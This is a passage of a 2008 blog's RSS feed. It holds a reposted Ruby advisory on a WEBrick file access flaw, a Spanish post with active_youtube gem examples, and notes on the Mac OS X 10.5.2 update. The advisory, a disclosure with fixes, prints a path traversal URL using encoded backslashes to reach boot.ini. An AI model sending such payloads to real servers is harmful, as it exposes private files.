        * 1.8.6-p113 and all prior versions

1.9 series

        * 1.9.0-1 and all prior versions

Solution

1.8 series
    Please upgrade to 1.8.5-p115 or 1.8.6-p114.

        * ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz (md5sum: 20ca6cc87eb077296806412feaac0356)
        * ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3)

1.9 series
    Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.

        * ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff (md5sum: b7b58aed40fa1609a67f53cfd3a13257)

Please note that a package that corrects this weakness may already be available through your package management software.
Credit

Credit to Digital Security Research Group (http://dsec.ru/) for disclosing the problem to Ruby Security Team.]]></description>
			<content:encoded><![CDATA[<p>WEBrick, a standard library of Ruby to implement HTTP servers, has file access vulnerability.<br />
Impact</p>
<p>The following programs are vulnerable.</p>
<p>   1. Programs that publish files using WEBrick::HTTPServer.new with the <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ocumentRoot option<br />
   2. Programs that publish files using WEBrick::HTTPServlet::FileHandler</p>
<p>Affected systems are:</p>
<p>   1. Systems that accept backslash (\) as a path separator, such as Windows.<br />
   2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X.</p>
<p>This vulnerability has the following impacts.</p>
<p>   1.</p>
<p>      Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator.</p>
<p>      Example:</p>
<p>http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini</p>
<p>   2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems.</p>
<p>Vulnerable versions</p>
<p>1.8 series</p>
<p>        * 1.8.4 and all prior versions<br />
        * 1.8.5-p114 and all prior versions<br />
        * 1.8.6-p113 and all prior versions</p>
<p>1.9 series</p>
<p>        * 1.9.0-1 and all prior versions</p>
<p>Solution</p>
<p>1.8 series<br />
    Please upgrade to 1.8.5-p115 or 1.8.6-p114.</p>
<p>        * ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz (md5sum: 20ca6cc87eb077296806412feaac0356)<br />
        * ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3)</p>
<p>1.9 series<br />
    Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.</p>
<p>        * ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff (md5sum: b7b58aed40fa1609a67f53cfd3a13257)</p>
<p>Please note that a package that corrects this weakness may already be available through your package management software.<br />
Credit</p>
<p>Credit to Digital Security Research Group (http://dsec.ru/) for disclosing the problem to Ruby Security Team.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/03/03/webricks-file-access-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Active YouTube</title>
		<link>http://www.freedomcoder.com.ar/2008/02/21/active-youtube/</link>
		<comments>http://www.freedomcoder.com.ar/2008/02/21/active-youtube/#comments</comments>
		<pubDate>Fri, 22 Feb 2008 00:52:57 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Spanish]]></category>
		<category><![CDATA[www]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/02/21/active-youtube</guid>
		<description><![CDATA[La verdad que encontre esto y me parecio re intersante un active youtube 

Para instalarlo :
<strong> gem install active_youtube </strong>

Aca el ejemplito para pegarle un vistaso :

<code>
#### Video
  ## search for videos on 'ruby'
  search = Youtube::Video.find(:first, :params => {:vq => 'ruby', :"max-results" => '5'})
  puts search.entry.length

  ## video information of id = ZTUVgYoeN_o
  vid = Youtube::Video.find("ZTUVgYoeN_o")
  puts vid.group.content[0].url

  ## video comments
  comments = Youtube::Video.find_custom("ZTUVgYoeN_o").get(:comments)
  puts comments.entry[0].link[2].href

  ## searching with category/tags
  results = Youtube::Video.search_by_tags("Comedy")
  puts results[0].entry[0].title

#### STANDARDFEED
  ## retrieving standard feeds
  most_viewed = Youtube::Standardfeed.find(:most_viewed, :params => {:time => 'today'})
  puts most_viewed.entry[0].group.content[0].url

#### USER
  ## user's profile - guthrie
  user_profile = Youtube::User.find("guthrie")
  puts user_profile.link[1].href

#### PLAYLIST
  ## get playlist - multiple elements in playlist
  playlist = Youtube::Playlist.find("EBF5D6DC4589D7B7")
  puts playlist.entry[0].group.content[0].url
</code>]]></description>
			<content:encoded><![CDATA[<p>La verdad que encontre esto y me parecio re intersante un active youtube </p>
<p>Para instalarlo :<br />
<strong> gem install active_youtube </strong></p>
<p>Aca el ejemplito para pegarle un vistaso :</p>
<p><code>#### Video<br />
  ## search for videos on 'ruby'<br />
  search = Youtube::Video.find(:first, :params =&gt; {:vq =&gt; 'ruby', :"max-results" =&gt; '5'})<br />
  puts search.entry.length</p>
<p>  ## video information of id = ZTUVgYoeN_o<br />
  vid = Youtube::Video.find("ZTUVgYoeN_o")<br />
  puts vid.group.content[0].url</p>
<p>  ## video comments<br />
  comments = Youtube::Video.find_custom("ZTUVgYoeN_o").get(:comments)<br />
  puts comments.entry[0].link[2].href</p>
<p>  ## searching with category/tags<br />
  results = Youtube::Video.search_by_tags("Comedy")<br />
  puts results[0].entry[0].title</p>
<p>#### STANDARDFEED<br />
  ## retrieving standard feeds<br />
  most_viewed = Youtube::Standardfeed.find(:most_viewed, :params =&gt; {:time =&gt; 'today'})<br />
  puts most_viewed.entry[0].group.content[0].url</p>
<p>#### USER<br />
  ## user's profile - guthrie<br />
  user_profile = Youtube::User.find("guthrie")<br />
  puts user_profile.link[1].href</p>
<p>#### PLAYLIST<br />
  ## get playlist - multiple elements in playlist<br />
  playlist = Youtube::Playlist.find("EBF5D6DC4589D7B7")<br />
  puts playlist.entry[0].group.content[0].url</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/02/21/active-youtube/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MacOSX 10.5.2 is out</title>
		<link>http://www.freedomcoder.com.ar/2008/02/11/macosx-1052-is-out/</link>
		<comments>http://www.freedomcoder.com.ar/2008/02/11/macosx-1052-is-out/#comments</comments>
		<pubDate>Mon, 11 Feb 2008 21:44:15 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2008/02/11/macosx-1052-is-out</guid>
		<description><![CDATA[Apple has released the Mac OS X 10.5.2 Leopard updates. The 180MB download is now available via Software Update, and a restart is required after installation:

The 10.5.2 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.

For detailed information on this update, please visit this website: <a href="http://docs.info.apple.com/article.html?artnum=307109">http://docs.info.apple.com/article.html?artnum=307109</a>.
For detailed information on security updates, please visit this website: <a href="http://docs.info.apple.com/article.html?artnum=61798">http://docs.info.apple.com/article.html?artnum=61798</a>.
A number of improvements are detailed, but some highlights are listed here:

- Airport: Improves connection reliability and stability
- Back to my Mac: Adds support for more third-party routers, as detailed in this article.
- Dock: Updates Stacks with a List view option, a Folder view option, and an updated background for Grid view.
- Desktop: Addresses legibility issues with the menu bar with an option to turn off transparency in Desktop &#038; Screen Saver preferences.
- Desktop: Adjusts menus to be slightly-less translucent overall.
- iSync: Adds support for Samsung D600E and D900i phones.
- RAW Image: Adds RAW image support for several cameras, as detailed in this article.
- Safari: Addresses issues with Safari reliably resolving certain domains.
- Time Machine: Adds a menu bar option for accessing Time Machine features (the menu extra can be enabled in Time Machine preferences).
- Time Machine: Improves backup reliability when computer name contains slash or non-ASCII characters.
- Time Machine: Addresses issues in which some external drives are not recognized by Time Machine.

Please add undocumented issues in the <a href="http://guides.macrumors.com/Mac_OS_X_10.5.2_Fixes%2C_Bugs_and_Problems">Mac OS X 10.5.2 Fixes, Bugs and Problems guide</a>.]]></description>
			<content:encoded><![CDATA[<p>Apple has released the Mac OS X 10.5.2 Leopard updates. The 180MB download is now available via Software Update, and a restart is required after installation:</p>
<p>The 10.5.2 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.</p>
<p>For detailed information on this update, please visit this website: <a href="http://docs.info.apple.com/article.html?artnum=307109">http://docs.info.apple.com/article.html?artnum=307109</a>.<br />
For detailed information on security updates, please visit this website: <a href="http://docs.info.apple.com/article.html?artnum=61798">http://docs.info.apple.com/article.html?artnum=61798</a>.<br />
A number of improvements are detailed, but some highlights are listed here:</p>
<p>- Airport: Improves connection reliability and stability<br />
- Back to my Mac: Adds support for more third-party routers, as detailed in this article.<br />
- Dock: Updates Stacks with a List view option, a Folder view option, and an updated background for Grid view.<br />
- Desktop: Addresses legibility issues with the menu bar with an option to turn off transparency in Desktop &#038; Screen Saver preferences.<br />
- Desktop: Adjusts menus to be slightly-less translucent overall.<br />
- iSync: Adds support for Samsung D600E and D900i phones.<br />
- RAW Image: Adds RAW image support for several cameras, as detailed in this article.<br />
- Safari: Addresses issues with Safari reliably resolving certain domains.<br />
- Time Machine: Adds a menu bar option for accessing Time Machine features (the menu extra can be enabled in Time Machine preferences).<br />
- Time Machine: Improves backup reliability when computer name contains slash or non-ASCII characters.<br />
- Time Machine: Addresses issues in which some external drives are not recognized by Time Machine.</p>
<p>Please add undocumented issues in the <a href="http://guides.macrumors.com/Mac_OS_X_10.5.2_Fixes%2C_Bugs_and_Problems">Mac OS X 10.5.2 Fixes, Bugs and Problems guide</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2008/02/11/macosx-1052-is-out/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

